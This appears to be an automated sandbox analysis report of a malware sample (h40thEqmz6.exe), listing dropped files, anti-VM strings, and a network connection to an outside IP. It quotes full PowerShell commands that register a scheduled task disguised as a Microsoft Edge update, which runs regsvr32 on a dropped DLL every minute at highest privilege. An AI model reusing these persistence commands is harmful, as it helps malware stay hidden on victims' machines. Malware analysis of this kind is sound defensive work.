Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 2510000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1AA30000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6014	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3784	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7466	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2083	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-CBKGS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-UGL1J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Setup_Coat.dll (copy)	Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

API coverage: 2.6 %

Source: C:\Windows\System32\regsvr32.exe TID: 3876	Thread sleep time: -39000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4028	Thread sleep count: 6014 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240	Thread sleep count: 3784 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4276	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1772	Thread sleep count: 7466 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4744	Thread sleep count: 2083 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Last function: Thread delayed

Source: C:\Windows\System32\regsvr32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: h40thEqmz6.tmp, 00000001.00000002.2002841139.000000000084A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000006.00000002.3245978560.000000001B2AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: h40thEqmz6.tmp, 00000001.00000002.2002841139.000000000084A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\_

Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

6_2_00007FF8A9305D24

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_00007FF8A934B740 GetProcessHeap,

6_2_00007FF8A934B740

Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 38.49.56.2 56003

Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\regsvr32.exe

Thread register set: 7160 5

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process created: C:\Users\user\Desktop\h40thEqmz6.exe "C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Coat.dll	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:360 c:\users\user\appdata\roaming\setup_coat.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{7a7d6bff-f589-4298-bdda-3bba941a2598}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:360 c:\users\user\appdata\roaming\setup_coat.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{7a7d6bff-f589-4298-bdda-3bba941a2598}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
